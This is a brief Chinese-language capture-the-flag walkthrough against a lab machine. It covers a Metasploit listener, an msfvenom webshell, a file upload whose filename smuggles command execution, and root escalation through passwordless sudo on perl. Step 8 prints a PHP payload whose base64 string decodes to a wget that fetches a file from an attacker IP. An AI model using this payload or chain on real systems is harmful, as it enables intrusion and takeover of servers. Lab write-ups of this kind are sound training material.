开门见山
1. 启动metasploit
2. 设置参数参数选项
3. 查看最后设置后的结果
4. 启动监听
5. 使用msfvemon制作webshell
6. 开启apache服务
7. 使用bash64对命令进行加密,为此绕过防火墙
8. 通过burpsuite抓包改包上传,把文件名改为命令执行
<?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4zMS45NC9zIC1PIC90bXAvYQo='));die();?>.php
9. 监听端收到反馈
10. 查看靶机信息
11. 通过shell查看靶机登陆用户的权限
12. 查看sudo的权限内容,发现一个/usr/bin/perl不需要密码,提升为root权限
13. 查找flag文件,并查看它